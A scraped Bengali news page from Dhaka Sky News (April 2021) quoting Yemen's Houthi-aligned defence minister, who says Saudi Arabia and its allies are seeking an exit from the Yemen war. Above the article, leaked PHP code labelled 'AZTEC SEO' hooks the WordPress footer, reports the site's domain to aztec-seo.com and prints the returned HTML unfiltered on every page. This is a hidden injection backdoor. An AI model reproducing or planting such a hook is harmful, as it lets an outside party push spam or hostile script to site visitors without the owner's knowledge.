/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইয়েমেন সংকট থেকে বের হওয়ার পথ খুঁজছে সৌদি: প্রতিরক্ষামন্ত্রী | Dhaka Sky News

ব্রিটিশ-অস্ট্রেলিয় নাগরিক গিলবার্ট ইসরাইলে গোয়েন্দা প্রশিক্ষণ নিয়েছিলেন: বিশ্লেষক

আগের সংবাদ

কসোভোর প্রেসিডেন্ট নির্বাচিত হলেন নারী আইনজীবী ভিউসা ওসমানি

পরের সংবাদ

ইয়েমেন সংকট থেকে বের হওয়ার পথ খুঁজছে সৌদি: প্রতিরক্ষামন্ত্রী

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: April 3, 2021 , 11:50 pm

ইয়েমেনের প্রতিরক্ষামন্ত্রী মেজর জেনারেল মোহাম্মাদ নাসের আল-আতিফি বলেছেন, সৌদি আরব ও তার মিত্র আগ্রাসনকারী দেশগুলো ইয়েমেন সংকট থেকে বের হওয়ার পথ খুঁজছে।

তিনি বলেন, “ইয়েমেনে আগ্রাসনকারী দেশগুলো এখন কঠিন পরিস্থিতির মধ্যে পড়েছে এবং এ কারণে তারা এখন মুক্তির উপায় খুঁজছে।” গতকাল (শুক্রবার) সন্ধ্যায় ইয়েমেনের আল-মাসিরা টেলিভিশন চ্যানেলকে দেয়া একান্ত সাক্ষাৎকারে জেনারেল আতিফি এসব কথা বলেন।

ইয়েমেনের প্রতিরক্ষামন্ত্রী বলেন, “আমরা বিভিন্ন তথ্য ও সমন্বয়ের ভিত্তিতে কথিত আরব জোটের আগ্রাসনকে চ্যালেঞ্জ করে আসছি যা রিয়াদ, ওয়াশিংটন, লন্ডন, প্যারিস ও তেল আবিবকে ক্ষুব্ধ করেছে। তবে তারা যতক্ষণ পর্যন্ত আগ্রাসন বহাল রাখবে ততক্ষণ পাল্টা হামলার মুখে পড়বে।”

জেনারেল আতিফি বলেন, সৌদি আরব ও তার আরব মিত্র দেশগুলো ইয়েমেন যুদ্ধে পরাজয় স্বীকার করতে চায় না কিন্তু তাদেরকে যারা যুদ্ধে জড়িয়ে দিয়েছে তার এখন মুখ রক্ষার জন্য পালাতে চেষ্টা করছে। সূত্র : পার্সটুডে